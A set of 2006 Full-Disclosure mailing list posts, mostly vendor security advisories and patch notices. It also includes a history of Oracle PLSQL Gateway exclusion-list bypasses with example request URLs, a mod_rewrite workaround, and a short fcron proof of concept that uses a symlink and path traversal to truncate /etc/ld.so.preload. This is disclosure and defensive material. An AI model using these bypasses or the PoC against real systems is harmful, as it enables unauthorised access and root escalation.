[Full-disclosure] about uncovering skype
I have similar confusing on the paper. The TCP packet detection part can not reproduce ether. It not mention what seed means, dose that the RC4 key? Or the RC4 key need generated from it. And it did not point out how to get the first cleared 10 byte of the first packet. Also it point out the first 2 packets are not using RC4 to cipher. Anyone has figure out how to decipher the first 2 packets? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CAID 33581 - CA Message Queuing Denial of Service Vulnerabilities
Title: CAID 33581 - CA Message Queuing Denial of Service Vulnerabilities CA Vulnerability ID: 33581 CA Advisory Date: 2006-02-02 Discovered By: Nicolas Pouvesle of Tenable Network Security Impact: Remote attacker can cause a denial of service condition. Summary: The following two security vulnerability issues have been identified in the CA Message Queuing (CAM / CAFT) software: 1) CAM is vulnerable to a Denial of Service (DoS) attack when a specially crafted message is received on TCP port 4105. 2) CAM is vulnerable to a Denial of Service (DoS) through the spoofing of CAM control messages. Mitigating Factors: None. Severity: CA has given these vulnerabilities a Medium risk rating. Affected Technologies: Please note that the CA Message Queuing (CAM / CAFT) software is not a product, but rather a common component that is included with multiple products. All versions of the CA Message Queuing software prior to v1.07 Build 220_16 and v1.11 Build 29_20 on the specified platforms are affected. The CA Message Queuing software is included in the following CA products, which are consequently potentially vulnerable. Affected Products: Advantage Data Transport 3.0 BrightStor SAN Manager 1.1, 1.1 SP1, 1.1 SP2, 11.1 BrightStor Portal 11.1 CleverPath OLAP 5.1 CleverPath ECM 3.5 CleverPath Predictive Analysis Server 2.0, 3.0 CleverPath Aion 10.0 eTrust Admin 2.01, 2.04, 2.07, 2.09, 8.0, 8.1 Unicenter Application Performance Monitor 3.0, 3.5 Unicenter Asset Management 3.1, 3.2, 3.2 SP1, 3.2 SP2, 4.0, 4.0 SP1 Unicenter Data Transport Option 2.0 Unicenter Enterprise Job Manager 1.0 SP1, 1.0 SP2 Unicenter Jasmine 3.0 Unicenter Management for WebSphere MQ 3.5 Unicenter Management for Microsoft Exchange 4.0, 4.1 Unicenter Management for Lotus Notes/Domino 4.0 Unicenter Management for Web Servers 5, 5.0.1 Unicenter NSM 3.0, 3.1 Unicenter NSM Wireless Network Management Option 3.0 Unicenter Remote Control 6.0, 6.0 SP1 Unicenter Service Level Management 3.0, 3.0.1, 3.0.2, 3.5 Unicenter Software Delivery 3.0, 3.1, 3.1 SP1, 3.1 SP2, 4.0, 4.0 SP1 Unicenter TNG 2.1, 2.2, 2.4, 2.4.2 Unicenter TNG JPN 2.2 Affected platforms: AIX, DG Intel, DG Motorola, DYNIX, OSF1, HP-UX, IRIX, Linux Intel, Linux s/390, Solaris Intel, Solaris Sparc, UnixWare and Windows. Platforms NOT affected: AS/400, MVS, NetWare, OS/2 and OpenVMS. Status and Recommendation: (note that URLs below may wrap) CA strongly recommends the application of the appropriate patch listed below. CAM v1.11 prior to Build 29_20 http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_cam 111fixes.asp CAM v1.07 prior to Build 220_16 http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_cam 107fixes.asp CAM v1.05 (any version) http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_cam 107fixes.asp Customers wishing to patch their Master Image CD sets should refer to the solution areas on the product home pages. http://supportconnectw.ca.com/main.asp Frequently Asked Questions (FAQ) related to this security update http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_FAQ .asp For USD/SDO Packages and UAM/AMO Definitions information, please refer to the SupportConnect Security Notice and FAQ. CA Message Queuing Security Notice http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_not ice.asp Determining CAM versions: Simply running camstat will return the version information in the top line of the output on any platform. The camstat command is located in the bin subfolder of the installation directory. The example below indicates that CAM version 1.11 build 27 increment 2 is running. E:\camstat CAM - machine.ca.com Version 1.11 (Build 27_2) up 0 days 1:16 Determining the CAM install directory: Windows: the install location is specified by the %CAI_MSQ% environment variable Unix/Linux/Mac: the /etc/catngcampath text file holds the CAM install location References: (note that URLs may wrap) CA SupportConnect: http://supportconnect.ca.com/ CA Message Queuing Security Notice http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_not ice.asp CAM / CAFT Security Notice Frequently Asked Questions http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_FAQ .asp CAID: 33581 CAID Advisory link: http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33581 CVE Reference: Pending http://cve.mitre.org/ OSVDB Reference: OSVDB-21146 http://osvdb.org/21146 OSVDB-21147 http://osvdb.org/21147 Changelog: v1.0 - Initial Release Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com. For technical questions or comments related to this advisory, please send email to [EMAIL PROTECTED], or contact me directly. If you discover a vulnerability in CA products, please report your findings to [EMAIL PROTECTED], or utilize our Submit a Vulnerability form. URL:
[Full-disclosure] The History of the Oracle PLSQL Gateway Flaw
In the past few days Oracle has criticized me for publishing a workaround for a critical flaw in their PLSQL Gateway. This email will show that after 4 years of waiting for Oracle to try to get it right, I eventually decided to take matters into my own hands and provide Oracle customers with more help than Oracle is currently doing. Oracle - shame on you: The Oracle PLSQL Gateway sits on a web server and allows web users to execute PLSQL applications in an Oracle database server. When first introduced, as long as a web user had the permission to execute the PLSQL procedure and knew its name then they could execute it through the PLSQL gateway. This clearly opens up a massive security risk and Oracle introduced what is known as the PLSQLExclusionList to help limit exposure. Essentially, if a web user attempts to access any plsql package listed in the exclusion list then the Gateway rejects the user's request with a forbidden message. So access to anything that started with SYS., for example, would be blocked. Or that's what's supposed to happen, anyway. There are two distinct problems with this solution. Firstly, it's never worked and the exclusion list can be totally bypassed and secondly, it's a half baked idea to begin with. Let's delve deeper and examine both of these When Oracle first introduced the exclusion list in 2001 it could be trivially bypassed by preceding the plsql package name with a newline character http://www.example.com/pls/dad/%0ASYS.PACKAGE.PROCEDURE I advised Oracle about this bypass problem in 2001 and, once Oracle patched this, I published details in Hackproofing Oracle Application Server (http://www.ngssoftware.com/papers/hpoas.pdf) It didn't take long to discover that this patch could be bypassed using the following techinque: due to internationalization, an Oracle database server will convert the ÿ character (value 0xFF) to a capital Y. The PLSQL Gateway will not. Thus, if we request http://www.example.com/pls/dad/S%FFS.PACKAGE.PROCEDURE the gateway will happily pass it over to the database server where the ÿ is conveted to a Y and we can gain access again. Oracle issued a patch for this but this patch was broken, too. What's interesting is the story behind how I found the next bypass technique. I had just reported some flaws in a few PLSQL applications in the database server but there was only a risk if an attacker could bypass the exclusion list. As Oracle had just released a fix for the bypass problem they stated they were not going to fix the backend flaws. This is from the email they sent me informing me that they weren't going to fix these issues We feel that our latest fix to security alert #68 will now correctly block any request that matches the patterns defined in the exclusion list. The OWA_OPT_LOCK package falls under the OWA_* pattern. Therefore, this request will be blocked by the exclusion list feature. Since the exclusion list cannot be bypassed anymore, we are not allowing anyone to call this package from the browser, and thereby, blocking this PL/SQL injection from happening. This angered me as it was clear laziness on Oracle's part and they were deliberately leaving their customers at risk. I then set out to find a new bypass technique and eleven minutes after reading this mail I found what I was looking for. This new bypass technique simplly involved enquoting - putting SYS in double quotes: http://www.example.com/pls/dad/SYS.PACKAGE.PROCEDURE Whilst this bypass worked on Oracle Application Server 9 - it didn't on 10g. The technical reason for this is as follows. 10g App Server converts the upper case SYS to the lower case sys - and if something is enquoted - it needs to match the right case. However, a bypass trick that did work with 10g was to use angle brackets - these form a label in PLSQL. http://www.example.com/pls/dad/LABELSYS.PACKAGE.PROCEDURE So come July 2005 Oracle had really made a mess of all this and introduced their next patch. This can be bypassed too - this is the one I posted a workaround for and we're all currently waiting on Oracle fixing. Going back to the second problem - that is - the PLSQL Exclusion List is a half baked idea to begin with. The exclusion list, by default, attempts to block access to the following SYS.* DBMS_* UTL_* OWA_* OWA.* HTP.* HTF.* Thus, by default, access to packages owned by accounts such as CTXSYS or MDSYS is not blocked. These two accounts are both DBAs and, what's more, many of the PLSQL applications owned by these accounts have suffered from security flaws. As the exclusion list doesn't block access to these accounts, these flaws can be exploited via the web server to gain complete control of the database server. The point is the exlusion list is a black list solution and the problem with black lists is that you need to know in advance everything that is bad and should be black listed. It's a much easier proposition to know what is not bad though and only allow access to this. This is
[Full-disclosure] More on the workaround for the unpatched Oracle PLSQL Gateway flaw
According to Oracle, the workaround I posted, that prevents exploitation of
a critical vulnerability that Oracle has so far failed to fix, breaks
certain applications that sits atop their PLSQL Gateway. Though my
workaround prevents exploitation of the critical flaw and thus protects
vulnerable systems against attack, Oracle has made no effort to furnish me,
or anyone else for that matter, with more information on how the workaround
breaks some of their applications. As such, improving the workaround so it
doesn't break these few applications has been mildy annoying. But I think
I've tracked it down. The workaround as is
RewriteEngine on
RewriteCond %{QUERY_STRING} ^.*\).*|.*%29.*$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack
will trigger if a right facing bracket ')' appears in the PATH_INFO or
_anywhere_ in the query string. Thus, if the value of a query string
parameter contains a bracket the workaround will trigger. As far as the flaw
is concerned, we need only concern ourselves with brackets that appear in
the query string parameter name - not in the value for the parameter name.
As such, if we modify the workaround to
RewriteEngine on
RewriteCond %{QUERY_STRING} ^.*\).*=|.*%29.*=$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack
we can prevent exploitation if the query string parameter name has a bracket
whilst still allowing brackets it the paramter value. This can be tidied up
to read
RewriteEngine on
RewriteCond %{QUERY_STRING} \).*=|%29.*=
RewriteRule .? http://127.0.0.1/denied.htm?attempted-attack
RewriteRule \)|%29 http://127.0.0.1/denied.htm?attempted-attack
# Thanks, Mike Pomraning!
For those that haven't been able to adopt the workaround because it would
break their specific application, then the modified workaround should work
in your situation.
Cheers,
David Litchfield
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fcrontab - memory corruption on heap.
On Wed, Feb 01, 2006 at 03:28:50PM +0100, Adam Zabrocki wrote:
= Name: Fcron - convert-fcrontab
= Vendor URL:http://fcron.free.fr
= Author:Adam Zabrocki [EMAIL PROTECTED]
= Date: November 25, 2005
=
=
=
=
= Issue:
=
= Fcron (convert-fcrontab) allow users to corruption on heap section.
Hi pi3 and list,
There are much simplier bugs in convert-fcrontab, which toghether allows to
gain uid0 privileges.
* convert-fcrontab lacks any checks on file path passed to it. Attacker could
get outside of fcron spool directory using ../.
* convert-fcrontab opens temporary file without O_EXCL flag.
PoC:
perl -e '{print fcrontab-017\nuser\x001132863099\n\x00\x00\x00\x00}'
/tmp/fc_file
ln -s /etc/ld.so.preload /tmp/fc_file.tmp
convert-fcrontab ../../../../tmp/fc_file
Will create empty /etc/ld.so.preload file or truncate existing.
Tested on fcron 2.9.5 shipped with trustix 2.2 (setuid root by default), and
fcron 3.0.0.
regards Karol
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:029 ] - Updated libast packages fixes buffer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:029 http://www.mandriva.com/security/ ___ Package : libast Date: February 2, 2006 Affected: 2006.0 ___ Problem Description: Buffer overflow in Library of Assorted Spiffy Things (LibAST) 0.6.1 and earlier, as used in Eterm and possibly other software, allows local users to execute arbitrary code as the utmp user via a long -X argument. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0224 ___ Updated Packages: Mandriva Linux 2006.0: bf46177b085a67b202f18b755e34ce60 2006.0/RPMS/libast2-0.6.1-2.1.20060mdk.i586.rpm 16fb69d856d3e877606e8551c359f80c 2006.0/RPMS/libast2-devel-0.6.1-2.1.20060mdk.i586.rpm cc286e5022b221bc91179ac18e39f22b 2006.0/SRPMS/libast-0.6.1-2.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 63ecae854470eed332836e1ccd231fd0 x86_64/2006.0/RPMS/lib64ast2-0.6.1-2.1.20060mdk.x86_64.rpm 03cba4d84d22a70711e096bab7db33f4 x86_64/2006.0/RPMS/lib64ast2-devel-0.6.1-2.1.20060mdk.x86_64.rpm cc286e5022b221bc91179ac18e39f22b x86_64/2006.0/SRPMS/libast-0.6.1-2.1.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFD4kE/mqjQ0CJFipgRAswwAKC0q1rtT6YbTuceCNFEHcIpYe9KaACfTGX6 2iCJNCx1Nxu8aijjqZICElM= =i551 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:031 ] - Updated kdegraphics packages fixes heap-based buffer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:031 http://www.mandriva.com/security/ ___ Package : kdegraphics Date: February 2, 2006 Affected: 2006.0 ___ Problem Description: Heap-based buffer overflow in Splash.cc in xpdf allows attackers to cause a denial of service and possibly execute arbitrary code via crafted splash images that produce certain values that exceed the width or height of the associated bitmap. Kdegraphics-kpdf uses a copy of the xpdf code and as such has the same issues. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0301 ___ Updated Packages: Mandriva Linux 2006.0: 05cc9d9192609e6947a23751b6fb21b1 2006.0/RPMS/kdegraphics-3.4.2-11.5.20060mdk.i586.rpm 708cbdb3e41c7108db265490e5779cd3 2006.0/RPMS/kdegraphics-common-3.4.2-11.5.20060mdk.i586.rpm 6c96fdbb9db6927eba1c1fe6f4f5cf12 2006.0/RPMS/kdegraphics-kdvi-3.4.2-11.5.20060mdk.i586.rpm d04355d153efa6c3274c106ffdb23776 2006.0/RPMS/kdegraphics-kfax-3.4.2-11.5.20060mdk.i586.rpm 377ab151f92b3ef1d02dd280010491b2 2006.0/RPMS/kdegraphics-kghostview-3.4.2-11.5.20060mdk.i586.rpm db0ba637603ff299b83b789db9acf98f 2006.0/RPMS/kdegraphics-kiconedit-3.4.2-11.5.20060mdk.i586.rpm 314122999fcee0d62e79db850fe0876c 2006.0/RPMS/kdegraphics-kolourpaint-3.4.2-11.5.20060mdk.i586.rpm bad7784d58903a1d7d76aa9b3ae56345 2006.0/RPMS/kdegraphics-kooka-3.4.2-11.5.20060mdk.i586.rpm e530e96917b2296cfb289f5123a042ac 2006.0/RPMS/kdegraphics-kpaint-3.4.2-11.5.20060mdk.i586.rpm 3adf08e61864ebf9b1da4916bf4aa5b3 2006.0/RPMS/kdegraphics-kpdf-3.4.2-11.5.20060mdk.i586.rpm 92a9d22e62ca1dc95b16ba5b192881f6 2006.0/RPMS/kdegraphics-kpovmodeler-3.4.2-11.5.20060mdk.i586.rpm 6dfe5233ca18b1c1780505c203e0bb7e 2006.0/RPMS/kdegraphics-kruler-3.4.2-11.5.20060mdk.i586.rpm 926a91082443f7cf04adcf3126be09ab 2006.0/RPMS/kdegraphics-ksnapshot-3.4.2-11.5.20060mdk.i586.rpm e502164d57e4e28cdf5f6bf7ddfd3fea 2006.0/RPMS/kdegraphics-ksvg-3.4.2-11.5.20060mdk.i586.rpm f6274a326d1234b5cdbbe6ea6ee5074e 2006.0/RPMS/kdegraphics-kuickshow-3.4.2-11.5.20060mdk.i586.rpm b627c6d89626522c7ac0b1db1aff60d5 2006.0/RPMS/kdegraphics-kview-3.4.2-11.5.20060mdk.i586.rpm 51f6043b09660216cf3b58183ae4c0e9 2006.0/RPMS/kdegraphics-mrmlsearch-3.4.2-11.5.20060mdk.i586.rpm c729f766472b88783c1e7ed01c278102 2006.0/RPMS/libkdegraphics0-common-3.4.2-11.5.20060mdk.i586.rpm 31cb7fb149f7b5c9ef8d72864daa8862 2006.0/RPMS/libkdegraphics0-common-devel-3.4.2-11.5.20060mdk.i586.rpm 386c0569e197451fea5a4e397dfacec4 2006.0/RPMS/libkdegraphics0-kghostview-3.4.2-11.5.20060mdk.i586.rpm 3c4d500b7bcd7d100e50f1076feca5c6 2006.0/RPMS/libkdegraphics0-kghostview-devel-3.4.2-11.5.20060mdk.i586.rpm 6d4bea12f029996bfcfded04875479c3 2006.0/RPMS/libkdegraphics0-kooka-3.4.2-11.5.20060mdk.i586.rpm 04eb92287e1d099f8aac20796b55a22b 2006.0/RPMS/libkdegraphics0-kooka-devel-3.4.2-11.5.20060mdk.i586.rpm 838aacb3a057a7f5a6d7d8cc11458761 2006.0/RPMS/libkdegraphics0-kpovmodeler-3.4.2-11.5.20060mdk.i586.rpm acf180efd104a8296558223d6eb8d863 2006.0/RPMS/libkdegraphics0-kpovmodeler-devel-3.4.2-11.5.20060mdk.i586.rpm 7b05741f85f1e3136435e8beb0507019 2006.0/RPMS/libkdegraphics0-ksvg-3.4.2-11.5.20060mdk.i586.rpm 6b9fed5002103f7a5b5a7018f0334cee 2006.0/RPMS/libkdegraphics0-ksvg-devel-3.4.2-11.5.20060mdk.i586.rpm c0c2f0e7110b22b38bb5c3b84c860f09 2006.0/RPMS/libkdegraphics0-kuickshow-3.4.2-11.5.20060mdk.i586.rpm d90c7ff03a87f7c8df35f9005671d16b 2006.0/RPMS/libkdegraphics0-kview-3.4.2-11.5.20060mdk.i586.rpm 7f09c2c76e06d81090c4a646fa602b4a 2006.0/RPMS/libkdegraphics0-kview-devel-3.4.2-11.5.20060mdk.i586.rpm 24762cf35a4cb099b04da82ed33d746f 2006.0/RPMS/libkdegraphics0-mrmlsearch-3.4.2-11.5.20060mdk.i586.rpm 1a2d59d9479691a3ccc608e37fa26e04 2006.0/SRPMS/kdegraphics-3.4.2-11.5.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: c369e1bd017e812362140e73ad38cf62 x86_64/2006.0/RPMS/kdegraphics-3.4.2-11.5.20060mdk.x86_64.rpm 0716ba07a943676453db8eb61dd392f4 x86_64/2006.0/RPMS/kdegraphics-common-3.4.2-11.5.20060mdk.x86_64.rpm 160a394b89558f0b09585748c868472b x86_64/2006.0/RPMS/kdegraphics-kdvi-3.4.2-11.5.20060mdk.x86_64.rpm 736c45f562adfcc7136e33e945b29be5 x86_64/2006.0/RPMS/kdegraphics-kfax-3.4.2-11.5.20060mdk.x86_64.rpm a5bc85d02768c18ddeb0c147c4677d15 x86_64/2006.0/RPMS/kdegraphics-kghostview-3.4.2-11.5.20060mdk.x86_64.rpm 2b90ae6915d37dc13362ef33b0915cb1 x86_64/2006.0/RPMS/kdegraphics-kiconedit-3.4.2-11.5.20060mdk.x86_64.rpm
[Full-disclosure] Flaw in rpcbind
Hi, There is aflaw inrpcbind when there is translation from transport-specific (local) address to a transport-independent (universal) address? I think there is a some problem. Anybody came through this issue? -- Anil K. Chaudhary ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:032 ] - Updated xpdf packages fixes heap-based buffer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:032 http://www.mandriva.com/security/ ___ Package : xpdf Date: February 2, 2006 Affected: 2006.0, Corporate 3.0 ___ Problem Description: Heap-based buffer overflow in Splash.cc in xpdf allows attackers to cause a denial of service and possibly execute arbitrary code via crafted splash images that produce certain values that exceed the width or height of the associated bitmap. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0301 ___ Updated Packages: Mandriva Linux 2006.0: 21b6cae8bc6307f990b3358019d9b618 2006.0/RPMS/xpdf-3.01-1.2.20060mdk.i586.rpm bb57f993783c281c8eec21627457aa2c 2006.0/SRPMS/xpdf-3.01-1.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: f170257a90c5130f3b363abe9f215ed8 x86_64/2006.0/RPMS/xpdf-3.01-1.2.20060mdk.x86_64.rpm bb57f993783c281c8eec21627457aa2c x86_64/2006.0/SRPMS/xpdf-3.01-1.2.20060mdk.src.rpm Corporate 3.0: cf0b4100d5c0b55b2ce53256226a2b47 corporate/3.0/RPMS/xpdf-3.00-5.8.C30mdk.i586.rpm cee7a22a052ea85fc57388a801188ea3 corporate/3.0/SRPMS/xpdf-3.00-5.8.C30mdk.src.rpm Corporate 3.0/X86_64: 8fcdf6bd62ac3a8d634c701311cdcf11 x86_64/corporate/3.0/RPMS/xpdf-3.00-5.8.C30mdk.x86_64.rpm cee7a22a052ea85fc57388a801188ea3 x86_64/corporate/3.0/SRPMS/xpdf-3.00-5.8.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFD4lCUmqjQ0CJFipgRAu4+AKC5gQ8Rg6vov31oG569916kiSWbDwCgy11b qKSStRcw0r+53RaGGHl8rnk= =BvNc -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:033 ] - Updated OpenOffice.org packages fix issue with disabled hyperlinks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:033 http://www.mandriva.com/security/ ___ Package : OpenOffice.org Date: February 2, 2006 Affected: 2006.0, Corporate 3.0 ___ Problem Description: OpenOffice.org 2.0 and earlier, when hyperlinks has been disabled, does not prevent the user from clicking the WWW-browser button in the Hyperlink dialog, which makes it easier for attackers to trick the user into bypassing intended security settings. Updated packages are patched to address this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4636 ___ Updated Packages: Mandriva Linux 2006.0: 3dee999dd248d5b405070b078bc33587 2006.0/RPMS/OpenOffice.org-1.1.5-2.2.20060mdk.i586.rpm a6e44f1c5ae79e6bff4f256b5605e1fb 2006.0/RPMS/OpenOffice.org-l10n-af-1.1.5-2.2.20060mdk.i586.rpm 907f4f481bf4c12258233b78bb49e1eb 2006.0/RPMS/OpenOffice.org-l10n-ar-1.1.5-2.2.20060mdk.i586.rpm 0e90101c2ac6d4b9c289c12b7dd1e248 2006.0/RPMS/OpenOffice.org-l10n-ca-1.1.5-2.2.20060mdk.i586.rpm 89049d9f8e0f34074bab49eda6ce0db3 2006.0/RPMS/OpenOffice.org-l10n-cs-1.1.5-2.2.20060mdk.i586.rpm a940d095a539a4e52502c1c1b9bba11e 2006.0/RPMS/OpenOffice.org-l10n-cy-1.1.5-2.2.20060mdk.i586.rpm f860093a6b0eb306f4903eb9f3f181d9 2006.0/RPMS/OpenOffice.org-l10n-da-1.1.5-2.2.20060mdk.i586.rpm 6f1992dd7dcf4c4011a087ea61f2cb03 2006.0/RPMS/OpenOffice.org-l10n-de-1.1.5-2.2.20060mdk.i586.rpm c0d6ba0f33ccbbd6acef1ff80d264bc7 2006.0/RPMS/OpenOffice.org-l10n-el-1.1.5-2.2.20060mdk.i586.rpm b55d67c8094d82348036b3289586d284 2006.0/RPMS/OpenOffice.org-l10n-en-1.1.5-2.2.20060mdk.i586.rpm 49c435598a3eedad90b8e1a56e7361f2 2006.0/RPMS/OpenOffice.org-l10n-es-1.1.5-2.2.20060mdk.i586.rpm 51f08254141a5bbb38b0290abe16784e 2006.0/RPMS/OpenOffice.org-l10n-et-1.1.5-2.2.20060mdk.i586.rpm 236582a21a049e403363598e07583e33 2006.0/RPMS/OpenOffice.org-l10n-eu-1.1.5-2.2.20060mdk.i586.rpm 1fe921d03ae685abae102fe044b5dd4f 2006.0/RPMS/OpenOffice.org-l10n-fi-1.1.5-2.2.20060mdk.i586.rpm 11ff5ad3d2d98e2468b52777b0c6299b 2006.0/RPMS/OpenOffice.org-l10n-fr-1.1.5-2.2.20060mdk.i586.rpm fa73e9e25532bef45ca1dba87dc5f597 2006.0/RPMS/OpenOffice.org-l10n-he-1.1.5-2.2.20060mdk.i586.rpm 0066e690376ab789b8ded30c808d1ccf 2006.0/RPMS/OpenOffice.org-l10n-hu-1.1.5-2.2.20060mdk.i586.rpm dddb79794a203128e505b8ee4b9ed376 2006.0/RPMS/OpenOffice.org-l10n-it-1.1.5-2.2.20060mdk.i586.rpm a0e81d419476a0a3a095d605f3edad8f 2006.0/RPMS/OpenOffice.org-l10n-ja-1.1.5-2.2.20060mdk.i586.rpm 44ed9f09bdfa364ccf32ca24f3c3681e 2006.0/RPMS/OpenOffice.org-l10n-ko-1.1.5-2.2.20060mdk.i586.rpm d015a5722dbe141f41f3e62fd06fae1e 2006.0/RPMS/OpenOffice.org-l10n-nb-1.1.5-2.2.20060mdk.i586.rpm 350f1ae4c81f6d102d7fa725e833facd 2006.0/RPMS/OpenOffice.org-l10n-nl-1.1.5-2.2.20060mdk.i586.rpm 27a7fec93f39822970bd0ed4783bc415 2006.0/RPMS/OpenOffice.org-l10n-nn-1.1.5-2.2.20060mdk.i586.rpm 627b05bb762b52d1388bd95db921346d 2006.0/RPMS/OpenOffice.org-l10n-ns-1.1.5-2.2.20060mdk.i586.rpm 4ba08965b4709a449b1aeb96dc41e8ad 2006.0/RPMS/OpenOffice.org-l10n-pl-1.1.5-2.2.20060mdk.i586.rpm df4ff901584a62775afd64539f40fef4 2006.0/RPMS/OpenOffice.org-l10n-pt-1.1.5-2.2.20060mdk.i586.rpm 5035004c9dacccb1cbaec68f0b60390c 2006.0/RPMS/OpenOffice.org-l10n-pt_BR-1.1.5-2.2.20060mdk.i586.rpm a451e3a7488edb20b48d065866fc90de 2006.0/RPMS/OpenOffice.org-l10n-ru-1.1.5-2.2.20060mdk.i586.rpm 4520ff8f7b62aa4603d204ecbd3c60a7 2006.0/RPMS/OpenOffice.org-l10n-sk-1.1.5-2.2.20060mdk.i586.rpm a9a563fb0ad8ed3084f6026698aab08b 2006.0/RPMS/OpenOffice.org-l10n-sl-1.1.5-2.2.20060mdk.i586.rpm 6e320635bd5c6154b3378b702861edb1 2006.0/RPMS/OpenOffice.org-l10n-sv-1.1.5-2.2.20060mdk.i586.rpm ba2763e07655b6aef443a1fecd7f13eb 2006.0/RPMS/OpenOffice.org-l10n-tr-1.1.5-2.2.20060mdk.i586.rpm ab7f145444e399490ef1e902b525e116 2006.0/RPMS/OpenOffice.org-l10n-zh_CN-1.1.5-2.2.20060mdk.i586.rpm 8f5a6e7ad4d56700624e7e77252a6e69 2006.0/RPMS/OpenOffice.org-l10n-zh_TW-1.1.5-2.2.20060mdk.i586.rpm 9d0ab55c3af3ed5f401ae065c8a26011 2006.0/RPMS/OpenOffice.org-l10n-zu-1.1.5-2.2.20060mdk.i586.rpm a7705f07dc82b85bd7cb050ec11aec18 2006.0/RPMS/OpenOffice.org-libs-1.1.5-2.2.20060mdk.i586.rpm 6a6f4ab1836c36fbe6715c4141d2e99a 2006.0/SRPMS/OpenOffice.org-1.1.5-2.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 3dee999dd248d5b405070b078bc33587 x86_64/2006.0/RPMS/OpenOffice.org-1.1.5-2.2.20060mdk.i586.rpm a6e44f1c5ae79e6bff4f256b5605e1fb x86_64/2006.0/RPMS/OpenOffice.org-l10n-af-1.1.5-2.2.20060mdk.i586.rpm 907f4f481bf4c12258233b78bb49e1eb
Re: [Full-disclosure] Anyone got any security contacts at Apple?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Thanks to everyone who responded so quickly on this, really appreciate it. xyberpix Blog: http://blogs.securiteam.com On 2 Feb 2006, at 23:00, KF (lists) wrote: [EMAIL PROTECTED] -KF Robert Carr wrote: Is there some kind of mailing list that anyone knows of for updates, etc? For instance, M$ sends out update notifications about patches. Thanks, Robert Robert Carr Desktop Support Manager University of Kentucky Medical Center 859.323.5141 [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (Darwin) iD8DBQFD4pe32VKEoIQBZwkRAkPBAJoDFlqGkiXo7+OiAp3ZQNN8m6DbXQCfa3Db iRTqoquvUcLTwjBEfJcCptc= =p4dY -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Neomail Cross Site Scripting Vulnerability
Title: Neomail Cross Site Scripting
Author: Simo Ben youssef aka _6mO_HaCk simo_at_morx_org
